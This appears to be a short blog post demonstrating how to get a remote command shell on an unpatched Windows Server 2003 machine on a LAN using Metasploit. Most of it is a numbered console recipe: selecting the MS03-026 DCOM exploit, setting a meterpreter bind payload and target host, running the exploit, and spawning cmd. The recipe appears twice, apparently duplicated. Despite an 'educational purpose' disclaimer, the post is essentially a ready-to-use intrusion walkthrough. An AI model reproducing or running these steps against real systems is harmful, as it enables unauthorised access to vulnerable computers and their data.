Remote Access Computer [Armitage]
This is just for a demo of how I used metasploit for accessing a remote computer with windows 2003 server (192.168.2.14) in my lan. It's all done in the commandline interface using metasploit. You can check the embeded video which demonstrates how one can do the very same using armitage (GUI too) with metasploit in bactrack5 (revolution). It's just for educational purpose. Don't use this for any wrong intentions. Let me tell that it works in unpatched systems like windows xp, windows server2003, etc. It doesn't work for the systems with the security patches applied like windows7. 1)open terminal
2)./msfconsole
3)show exploits
4)use msrpc_dcom_ms03_026
5)show payloads
6)set PAYLOAD win32_bind_meterpreter
7)show options
8)set RHOST 192.168.2.14
9)set RPORT 23
10)exploit
11)help
12) use -m process
13)help
14)execute
15)execute -f cmd -c
16)interact 1
17) voila you get access right there
Check this video or click this link.
2)./msfconsole
3)show exploits
4)use msrpc_dcom_ms03_026
5)show payloads
6)set PAYLOAD win32_bind_meterpreter
7)show options
8)set RHOST 192.168.2.14
9)set RPORT 23
10)exploit
11)help
12) use -m process
13)help
14)execute
15)execute -f cmd -c
16)interact 1
17) voila you get access right there
Check this video or click this link.
Comments
Post a Comment